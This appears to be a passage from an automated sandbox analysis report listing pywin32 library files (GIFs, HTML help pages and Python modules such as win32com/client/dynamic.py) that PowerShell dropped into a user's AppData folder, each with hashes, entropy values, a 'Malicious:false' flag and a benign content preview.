                                                                                                                                                                                                  SHA-256:C05275607AEC384CC1AF78C310EA8118A426A961819000ED9C23C43091E99BE5
                                                                                                                                                                                                  SHA-512:3513B4D25FC305826A6A144DE8905D229D87B93421DA37A5ECBCA6FC973BFB6DB8470CF962A0935C20DFD1CBE594F1FFAEB2C0D1ABE558A38C6623CCB7DC1F80
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:GIF89aG............DDD...............!.......,....G...@......0.."........8v.E~.hr...tm.x..-....W..^....T.Z-.lH........r.C.E..!.\USm^.\.q.h..v.~.....sv.ub..a..e..rY.)l^.V.zGi..og.)....1F[f(...I 8..?.C`0..........;

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\HTML\image\blank.gif

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:GIF image data, version 89a, 71 x 19
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):864
                                                                                                                                                                                                  Entropy (8bit):1.0318120452961643
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:CullXllVyltxlrlltI4ea2b/i9WPzfJz9N2Py2sPfen:f/AWa39WzJzd5e
                                                                                                                                                                                                  MD5:964D040EAA0B1CD047E98A653A6B575E
                                                                                                                                                                                                  SHA1:4FD001A06732466F6E2C02EED2F742045A4794E9
                                                                                                                                                                                                  SHA-256:8893BF529F1745753203C6183687ED80995538D79F76C5C414D7C8B90C5614CB
                                                                                                                                                                                                  SHA-512:DD4C7662908C48E22FDDD1DA991863CA3DE3D26D262B8AB3EF10063AEC8C9DE445BE5AB145EA5C9B7D938A1F976A2907B9AE230B435C07598116DAAD04C061DB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:GIF89aG......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!.......,....G...@.=....H......*\....#J.H....3j.... C..I...(S.\...0c.y1 .;

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\HTML\image\pycom_blowing.gif

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:GIF image data, version 89a, 624 x 113
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20926
                                                                                                                                                                                                  Entropy (8bit):7.905038510815239
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:x2exoV/K9n4vEVknwRun99AwdOeQWrALv5MFp6l2cdj65lO:x2/V/TMV5RunjAw0WrALI+6G
                                                                                                                                                                                                  MD5:50BCEB72ABB5FA92A1B13A615288EA2E
                                                                                                                                                                                                  SHA1:5C3A6324856DCBE7D1A11F3F5E440BB131551784
                                                                                                                                                                                                  SHA-256:B3C652073B3C75F5AC81381B6F44B8DEEAD065C635C63771A0806E48778BAFAA
                                                                                                                                                                                                  SHA-512:C52C9DB12DEF0226C21105AB818DB403EFB666265AC745C830D66018437F8AC3E98307E94736A84BCAB9AD7895B2183D6C4B9CCEC0FC43517E433AC50BCAF351
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:GIF89ap.q..........TTTrrr.................HH.vv..........O...nj.FA.0-....hei..D1,.ZN.iXS1'.E".K.0/..qNfM'H0..F.F.q&.I..H..JslKTN,....k..M..G..p...lh-65....ddS.......m............m..+........""...l...mm......O..0...HI.........Qp....O4D.BI/Nj...q..pR.."5.Kq/H.....#E.+p.g.R.G.-...+.-../..x.sE.3s.k.m.K.Ee.d...1./.i.............0m2.V.&./.6..E.+E.MjQ.#..m-4.Q..1.A)K.j3fN.....Y"'%.K...&......AFE.......u...b]......L..m..o..4...ML..........LK.`^eff...cssTood.....7LLU..App...m..C..N..#JJ5..$ttM...tt...P..-.........''.qq......L..4op...&..j............68.....-..n.......................P......`.h..i...Pp...n..........5b.Tr......n....58<.Ms0j.........FMb......gk.PV............PP.....rr........O2..h...[.......j.d.g.O....i......a................oLP)..!.......,....p.q.@...Y..H......*\....cy.81.&^.....q.!p )..Dr..V...T..P.b..........sR%M@)zb.HT,..h.\...P.J.J....%....W..$a..q.!..V...P..pcD......10...l.4i...Ev...]..$>...p....$..Y.:...0.L...y.._8.<|......}e

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\HTML\image\pythoncom.gif

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:GIF image data, version 89a, 362 x 80
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5767
                                                                                                                                                                                                  Entropy (8bit):7.345178911604584
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:WJEohZ4Peq7NUyUePpEeuynEoQ6l0ygrn5OBOhrdq4TkJKrVG:WvYeqhUyUePpAynEoQs+50SrnkJGVG
                                                                                                                                                                                                  MD5:56EB975DA19AC3C45CB4B49F2712F6A8
                                                                                                                                                                                                  SHA1:00783867B85B13069E976857C571249BF458A675
                                                                                                                                                                                                  SHA-256:A4120DA0083D2E900596501E44CE6F1C780D71252D5A502DCBB6D8923327061A
                                                                                                                                                                                                  SHA-512:5D03BDD3EA70FDDBF17515AB67D8555EC4F548B142AD6B0A6A48F0812F78ADB7F406C64147D97A85BD3587340379D360CF46DA8E7AFFB3DE055851289465A959
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:GIF89aj.P................... (((000888@@@HHHPPPXXX```hhhpppxxx.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!..... .,....j.P.@...C..H......*\....#J.H....3j...@.. C..(`A..(/R.9`C.0Qv..M..2 ......4...0.....@p.1....|F.P ..D>..k....T.@!B..8.|..#H.'.zx.2A.x...@t$......./H...f.P.....#S...H...f(......H...d....v.....o

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\HTML\image\www_icon.gif

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:GIF image data, version 89a, 40 x 40
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):275
                                                                                                                                                                                                  Entropy (8bit):6.786005219619326
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:G0/tTJ8/U93q+sPV9XIzHvpHs4LxRQEGHOK:HcU93OnwTd6XOK
                                                                                                                                                                                                  MD5:3FE9EA4E617AF99C099CD12C29C2AF09
                                                                                                                                                                                                  SHA1:56C61258444E1765E97DFBF86DAF3D933CE6C241
                                                                                                                                                                                                  SHA-256:4C9C3686EAAD40595DDBCD00861437F5EB66D484EC878720F3DEA1322D8FAF87
                                                                                                                                                                                                  SHA-512:B423D4D36E448780A1897301C7E3D4E6B3EB9057B732748300B7666A267DDDB5EC7BF312B431EDECB4D471DE8E2917B160C78D763C13FD698F1FDC10B8443A4E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:GIF89a(.(............................!.......,....(.(........0.I..8.._@(..#.h..e../..0!.5.l4|....C..q5........t>.).RR....-.7....4..N.....M_..t.X.b..yyb.4xt.~*h...ow....f. ............n.qne...~....d.....B..}iY7w}...9*GQ...VXY. .QR/.L.I.+...5..].....9.-...%...............;

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\HTML\index.html

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1629
                                                                                                                                                                                                  Entropy (8bit):5.422100882226218
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:FIPX2+wycBC/6MKdwkSoy6I2rbAsB8mKlVIOFjK:FOX2FycBC/6MmAJl2rbUzIsO
                                                                                                                                                                                                  MD5:06E3AC587BA11A988172867D410EAACE
                                                                                                                                                                                                  SHA1:F1D7453A477489A6A44912D0F722A7E52B3CF171
                                                                                                                                                                                                  SHA-256:84BDCED6979959A42FF4E492E4515456282A5E619DD3B7B4CB86082D9BC87972
                                                                                                                                                                                                  SHA-512:DE5AB002E106DDFB98E3B793F499DFC990C72F493752A8443D752C48816DC0A84D3FEE4E90D922A119885609D05D0793ADC729C773245548CAD7D7C6A175F933
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<HTML>.<HEAD>.<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">.<META NAME="Generator" CONTENT="Microsoft Word 97">.<TITLE>win32com</TITLE>.<META NAME="Template" CONTENT="C:\Program Files\Microsoft Office\Office\html.dot">.</HEAD>.<BODY TEXT="#000000" LINK="#0000ff" VLINK="#0000ff">.<DIR>..<P> Enclose the entire page in UL, so bullets don't indent. --></P>.<H1><IMG SRC="image/pycom_blowing.gif" WIDTH=549 HEIGHT=99></H1>.<H2>Python and COM</H2>.<H3>Introduction</H3>.<P>Python has an excellent interface to COM (also known variously as OLE2, ActiveX, etc).</P>.<P>The Python COM package can be used to interface to almost any COM program (such as the MS-Office suite), write servers that can be hosted by any COM client (such as Visual Basic or C++), and has even been used to provide the core ActiveX Scripting Support. </P>...<UL>.<LI>Note that win32com is now released in the win32all installation package. The <A HREF="../win32all/win32all.exe">installation EXE ca

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\HTML\misc.html

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:HTML document, Non-ISO extended-ASCII text, with very long lines (301)
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1164
                                                                                                                                                                                                  Entropy (8bit):5.3901383302894965
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:FIxxlb2SRh1L+Co68YGAJU3fTtABGLTWjtQ9iQsboWP3spwyyLRwY06Fsims:FIPiCvGAJAA6WRacs48pwyyLRw36ers
                                                                                                                                                                                                  MD5:C07F8018DCCEFB86169BA4C87A75E0D3
                                                                                                                                                                                                  SHA1:21CD87EB1792B6E3179C4D5B3BB5A8EE877C0A72
                                                                                                                                                                                                  SHA-256:1CB2278F301A053F742562959C5AF9DCEB8836130180CB19FA536E9128306DDB
                                                                                                                                                                                                  SHA-512:68CDF0119C2FAE9220EFC45CD2C0BD2A3CBAAADDECB123247500EB62493AE13693063A45B638575E40FAB802B28CCA4827DC781805A00B9B8835B54F6B0DE751
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<HTML>.<HEAD>.<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">.<META NAME="Generator" CONTENT="Microsoft Word 97">.<TITLE>Misc win32com Stuff</TITLE>.<META NAME="Version" CONTENT="8.0.3410">.<META NAME="Date" CONTENT="10/11/96">.<META NAME="Template" CONTENT="D:\Program Files\Microsoft Office\Office\HTML.DOT">.</HEAD>.<BODY TEXT="#000000" BGCOLOR="#ffffff">..<H1>Misc stuff I don.t know where to put anywhere else</H1>.<H4>Client Side Dispatch</H4>.<P>Using win32com.client.Dispatch automatically invokes all the win32com client side "smarts", including automatic usage of generated .py files etc.</P>.<P>If you wish to avoid that, and use truly "dynamic" objects (ie, there is generated .py support available, but you wish to avoid it), you can use win32com.client.dynamic.Dispatch</P>.<B><P>_print_details_() method</B><BR>.If win32com.client.dynamic.Dispatch is used, the objects have a _print_details_() method available, which prints all relevant knowledge about an o

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\HTML\package.html

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:HTML document, ASCII text, with LF, NEL line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3253
                                                                                                                                                                                                  Entropy (8bit):5.260386145456912
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:FOfl5O+WSjhiHpufYhWH9+0n+uGzo+ymliTV2u:FE7xjhkpuNkft0hYG
                                                                                                                                                                                                  MD5:7419E387B22EF6EFACD19177C929CD9D
                                                                                                                                                                                                  SHA1:7EDF39A325362956E9D7ED1DAAC5762E52683344
                                                                                                                                                                                                  SHA-256:32D4776316513F6881D9D4583D2323A285F950A7574864FF597AB3DC5C4E0F17
                                                                                                                                                                                                  SHA-512:7EE74FFFE49868D3D704874EDE54A97FB582A388D60D5E4967B221094CC16470865C13D9461B238AEAA745309CA1E4922B850EFE68004DE106802B846A084031
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<HTML>.<HEAD>.<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">.<META NAME="Generator" CONTENT="Microsoft Word 97">.<TITLE>The win32com package</TITLE>.<META NAME="Template" CONTENT="D:\Program Files\Microsoft Office\Office\html.dot">.</HEAD>.<BODY LINK="#0000ff" VLINK="#800080">..<H1><IMG SRC="image/pycom_blowing.gif" WIDTH=549 HEIGHT=99 ALT="Python and COM - Blowing the others away"></H1>.<H1>The win32com package </H1>.<FONT SIZE=2><P>This document describes the win32com package in general terms.</FONT> </P>.<FONT SIZE=2><P>The COM support can be thought of as existing in 2 main portions - the C++ support code (the core PythonCOM module), and helper code, implemented in Python. The total package is known as "win32com".</FONT> </P>.<FONT SIZE=2><P>The win32com support is stand-alone. It does not require Pythonwin.</FONT> </P>.<H2>The win32com package </H2>.<FONT SIZE=2><P>To facilitate an orderly framework, the Python "ni" module has been used, and the entire

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\HTML\variant.html

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5874
                                                                                                                                                                                                  Entropy (8bit):5.006870023723714
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:XAb1uKMlaFvYWuAMTzRmhId2FHRXsPWQ8yCH042yACUp/cor4cNKxK3m0+AeGQeF:Q3Fy50rRsPT4Y/ecUe9HTQe0Lkh/d
                                                                                                                                                                                                  MD5:8D4BB296B8C8522D9CB068FB681E41AA
                                                                                                                                                                                                  SHA1:D43461F8FCC2A4041FFC51F4945697354260B4F9
                                                                                                                                                                                                  SHA-256:81B298E39090B915E0FD683BAA5BBEBD8087F0A522679327D860C4609A203819
                                                                                                                                                                                                  SHA-512:7BF256A23AADFB185DA27EC66838109B328CE72828DCC5E8E834A1B8F81255CCD9F132430AEB3C21D5B9D660CBE42FAE742B214556233B6ECCCE0C2FCDB23A0B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<HTML>.<HEAD>. <TITLE>win32com.client.VARIANT</TITLE>.</HEAD>.<BODY>..<H2>Introduction</H2>.<p>.win32com attempts to provide a seamless COM interface and hide many COM .implementation details, including the use of COM VARIANT structures. This .means that in most cases, you just call a COM object using normal Python .objects as parameters and get back normal Python objects as results..</p>..<p>.However, in some cases this doesn't work very well, particularly when using."dynamic" (aka late-bound) objects, or when using "makepy" (aka early-bound).objects which only declare a parameter is a VARIANT..</p>..<p>.The <code>win32com.client.VARIANT</code> object is designed to overcome these .problems..</p>..<h2>Drawbacks</h2>.The primary issue with this approach is that the programmer must learn more .about COM VARIANTs than otherwise - they need to know concepts such as .variants being <em>byref</em>, holding arrays, or that some may hold 32bit .unsigned integers while others hold 64bit si

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script text executable Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4883
                                                                                                                                                                                                  Entropy (8bit):4.663042468205077
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:mg3XUOq2MdUqRRc+zkgL3TRF5iIyaOrnEbM/+N:moXrq2MdJRK8
                                                                                                                                                                                                  MD5:6A55DA3604C17E67D8CF46B93E6C1B7A
                                                                                                                                                                                                  SHA1:7E4061CE32AB9265BA5C8A4D0567CA02FDF799E2
                                                                                                                                                                                                  SHA-256:B850316AAC162BE68966A1042857D8ACEBB5576758ED7AEA38026B13B24F3F15
                                                                                                                                                                                                  SHA-512:A937E6582C9AC2A73FD4CF664A058B75D5A790E5BA9285AA3876E5FF860C8397ECE41173EEE73B9EF955F857E04AD0023E62D475CC454BBF97F41DCB925D25C6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#.# Initialization for the win32com package.#..import os.import sys..import pythoncom.import win32api..# flag if we are in a "frozen" build.._frozen = getattr(sys, "frozen", 1 == 0).# pythoncom dumbly defaults this to zero - we believe sys.frozen over it..if _frozen and not getattr(pythoncom, "frozen", 0):. pythoncom.frozen = sys.frozen..# Add support for an external "COM Extensions" path..# Concept is that you can register a seperate path to be used for.# COM extensions, outside of the win32com directory. These modules, however,.# look identical to win32com built-in modules..# This is the technique that we use for the "standard" COM extensions..# eg "win32com.mapi" or "win32com.axscript" both work, even though they do not.# live under the main win32com directory..__gen_path__ = "".__build_path__ = None.### TODO - Load _all_ \\Extensions subkeys - for now, we only read the default.### Modules will work if loaded into "win32comext" path....def SetupEnvironment():. HKEY_LOCA

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\client\CLSIDToClass.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1757
                                                                                                                                                                                                  Entropy (8bit):4.715819557466049
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:spQNKcrzGsTQc1a65NYPfdBnCHGc4/ymmhxL6m4A51QFCn4Aeu6:vZrzG6C6jYPfdgI/yFht6bKQFC4i6
                                                                                                                                                                                                  MD5:6BB00B514891314ED73AA459426522D1
                                                                                                                                                                                                  SHA1:7976F1ABD0D639E05AEAC24578C0A82F3B4C5388
                                                                                                                                                                                                  SHA-256:7579776B08334DCD4A9E865230FA716598D77B88BAE456D9702D8FA634119B9D
                                                                                                                                                                                                  SHA-512:7BC4B37A1BDBAFF1A7A15858982A0A60AE2E94B7B138208A59A6623567D39431D2E848D24CDD5E9CEAB3988BB5262674A71796F4BB947B861EB992C4797AF9C9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Manages a dictionary of CLSID strings to Python classes...Primary use of this module is to allow modules generated by.makepy.py to share classes. @makepy@ automatically generates code.which interacts with this module. You should never need to reference.this module directly...This module only provides support for modules which have been previously.been imported. The gencache module provides some support for loading modules.on demand - once done, this module supports it.....As an example, the MSACCESS.TLB type library makes reference to the.CLSID of the Database object, as defined in DAO3032.DLL. This.allows code using the MSAccess wrapper to natively use Databases...This obviously applies to all cooperating objects, not just DAO and.Access..""".mapCLSIDToClass = {}...def RegisterCLSID(clsid, pythonClass):. """Register a class that wraps a CLSID.. This function allows a CLSID to be globally associated with a class.. Certain module will automatically convert an IDispatch o

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\client\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26331
                                                                                                                                                                                                  Entropy (8bit):4.662613121389149
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:xDn8xR5SYxLvnNplhYf8glDkYcA3MRiboE:xr3KthIHDkYwiboE
                                                                                                                                                                                                  MD5:70DE4541C80DFC6A27365BF8043D80AB
                                                                                                                                                                                                  SHA1:7C4A70512C053FFA695B325FF5C9C12E0D71D41A
                                                                                                                                                                                                  SHA-256:21035DE60FD401BC34A28ED96009C7AA04A0738620F9807C9796303F186D89B0
                                                                                                                                                                                                  SHA-512:C94BFF9FB70D933E52B66B691770F0F2EECD9FBE42AFBC9B6345344A2137640C3E90B8E88A2C295DDF2FD088A8A56C1C6202A047F8B26BEF8AB118A6BF2C14FF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# This module exists to create the "best" dispatch object for a given.# object. If "makepy" support for a given object is detected, it is.# used, otherwise a dynamic dispatch object...# Note that if the unknown dispatch object then returns a known.# dispatch object, the known class will be used. This contrasts.# with dynamic.Dispatch behaviour, where dynamic objects are always used...import sys..import pythoncom.import pywintypes..from . import dynamic, gencache.._PyIDispatchType = pythoncom.TypeIIDs[pythoncom.IID_IDispatch]...def __WrapDispatch(. dispatch,. userName=None,. resultCLSID=None,. typeinfo=None,. UnicodeToString=None,. clsctx=pythoncom.CLSCTX_SERVER,. WrapperClass=None,.):. """. Helper function to return a makepy generated class for a CLSID if it exists,. otherwise cope by using CDispatch.. """. assert UnicodeToString is None, "this is deprecated and will go away". if resultCLSID is None:. try:. typeinfo = dispatch.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\client\build.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):29075
                                                                                                                                                                                                  Entropy (8bit):4.503335395447579
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:zSxuBqXhGnnlZFDg6IZR6Y7ig6ijpDnBScm:zSxREn1VIf6Y7ig6i1jBScm
                                                                                                                                                                                                  MD5:0AB057D2A7A2369EC9E19831CC4A1587
                                                                                                                                                                                                  SHA1:E683D374922194F72DCC185BEC7DB0C26BBCA0FA
                                                                                                                                                                                                  SHA-256:AC4866714136EDAB484F6C46FE8ED65D932CA7A9F045D5E3CA5C50054EF7E7D4
                                                                                                                                                                                                  SHA-512:0F140282A96FDF2D10ECB44147CB00F687CF55759D27DB602D9DC65365695292ED5ECB29490A089F89A26D99A96E7B888E0E5CD463D9A9D4938435A7C0DD6398
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Contains knowledge to build a COM object definition...This module is used by both the @dynamic@ and @makepy@ modules to build.all knowledge of a COM object...This module contains classes which contain the actual knowledge of the object..This include parameter and return type information, the COM dispid and CLSID, etc...Other modules may use this information to generate .py files, use the information.dynamically, or possibly even generate .html documentation for objects.."""..#.# NOTES: DispatchItem and MapEntry used by dynamic.py..# the rest is used by makepy.py.#.# OleItem, DispatchItem, MapEntry, BuildCallList() is used by makepy..import datetime.import string.import sys.from keyword import iskeyword..import pythoncom.import winerror.from pywintypes import TimeType...# It isn't really clear what the quoting rules are in a C/IDL string and.# literals like a quote char and backslashes makes life a little painful to.# always render the string perfectly - so just punt an

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\client\combrowse.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20283
                                                                                                                                                                                                  Entropy (8bit):4.650536842804007
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:IJzNvQMSutXh+PetXhsYQ4iyz086vDU45NT6jbXVS35shxdUIKyKaEwU63iAllEQ:cfXh+qXhs7pn6jL4psRbi108hDi
                                                                                                                                                                                                  MD5:D636DB533FB28417CA5FCFA82852E4D0
                                                                                                                                                                                                  SHA1:3A760E015522314A009EA46C35A5491553187077
                                                                                                                                                                                                  SHA-256:5346BE9647031E54C09AD20E974E25B4859AA698BC2394F86C2884939FF52189
                                                                                                                                                                                                  SHA-512:1EB83A93DA0958438CB591E9C2611E669ABEE72F0C910D528A0E646FD63C01192055E54F8C552C2924AE7CEA294648AFB5DAB5870C44335DB90B4A12D6DA784E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""A utility for browsing COM objects... Usage:.. Command Prompt.. Use the command *"python.exe combrowse.py"*. This will display. display a fairly small, modal dialog... Pythonwin.. Use the "Run Script" menu item, and this will create the browser in an. MDI window. This window can be fully resized... Details.. This module allows browsing of registered Type Libraries, COM categories,. and running COM objects. The display is similar to the Pythonwin object. browser, and displays the objects in a hierarchical window... Note that this module requires the win32ui (ie, Pythonwin) distribution to. work...""".import sys..import pythoncom.import win32api.import win32con.import win32ui.from pywin.tools import browser.from win32com.client import util...class HLIRoot(browser.HLIPythonObject):. def __init__(self, title):. super().__init__(name=title).. def GetSubList(self):. return [. HLIHeadingCategory(),. HLI_IEnumMoniker(.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\client\connect.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1556
                                                                                                                                                                                                  Entropy (8bit):4.386271235738792
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:JHextFm1Qb9j3JJ73fz5IQ4Xld8d55NlOCs4Dg:JextFHbR3J93f9yld8dbNlOCFg
                                                                                                                                                                                                  MD5:8E0D0CE09D9692FA8C0D21F2731EA363
                                                                                                                                                                                                  SHA1:323CF31B86CB7B914C4D1E535226EB4492DE823B
                                                                                                                                                                                                  SHA-256:F5DE4E185C02120C7D007F8BBA3FF79C05FBE661155CDFF43E65805E52F82BB4
                                                                                                                                                                                                  SHA-512:9485F97F637A270117E046998A8E9A48E171FB91E1B573190234235C7D8A88BA1A2F79E71528205CCFCD7160A5D5E92DA4E24282EDA9601C66BE3BB5DBFAB019
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Utilities for working with Connections""".import pythoncom.import win32com.server.util...class SimpleConnection:. "A simple, single connection object".. def __init__(self, coInstance=None, eventInstance=None, eventCLSID=None, debug=0):. self.cp = None. self.cookie = None. self.debug = debug. if not coInstance is None:. self.Connect(coInstance, eventInstance, eventCLSID).. def __del__(self):. try:. self.Disconnect(). except pythoncom.error:. # Ignore disconnection as we are torn down.. pass.. def _wrap(self, obj):. useDispatcher = None. if self.debug:. from win32com.server import dispatcher.. useDispatcher = dispatcher.DefaultDebugDispatcher. return win32com.server.util.wrap(obj, useDispatcher=useDispatcher).. def Connect(self, coInstance, eventInstance, eventCLSID=None):. try:. oleobj = coInstance._oleobj_. except At

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\client\dynamic.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28118
                                                                                                                                                                                                  Entropy (8bit):4.504848551157066
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:6UPqrCv6OYlSK5gZ5iE0aqsd2FZjbeyJOmM:6UP+7lh4iKjY56
                                                                                                                                                                                                  MD5:705FBE20E3B316291D0B873062F8B7EF
                                                                                                                                                                                                  SHA1:11842E4C3753557B894E4FCE3E2BCB6C9D684559
                                                                                                                                                                                                  SHA-256:1482C2802461E38DA4AD37169ACC6B73D8ECA9B343269ED73794C98DD72CE682
                                                                                                                                                                                                  SHA-512:A7BD1CDA28A3D654A65CAC65C35F7E674304F2CA834F761C7B9C345ED69FAA80D6B4EE6FA496DB6AD1457C0EC1042E85368B009056E621AC72A35B204793A299
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Support for dynamic COM client support...Introduction. Dynamic COM client support is the ability to use a COM server without. prior knowledge of the server. This can be used to talk to almost all. COM servers, including much of MS Office... In general, you should not use this module directly - see below...Example. >>> import win32com.client. >>> xl = win32com.client.Dispatch("Excel.Application"). # The line above invokes the functionality of this class.. # xl is now an object we can use to talk to Excel.. >>> xl.Visible = 1 # The Excel window becomes visible...""".import traceback.import types..import pythoncom # Needed as code we eval() references it..import win32com.client.import winerror.from pywintypes import IIDType..from . import build..debugging = 0 # General debugging.debugging_attr = 0 # Debugging dynamic attribute lookups...LCID = 0x0..# These errors generally mean the property or method exists,.# but can't be used in this context - eg, property instead of a method, et

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\client\gencache.py

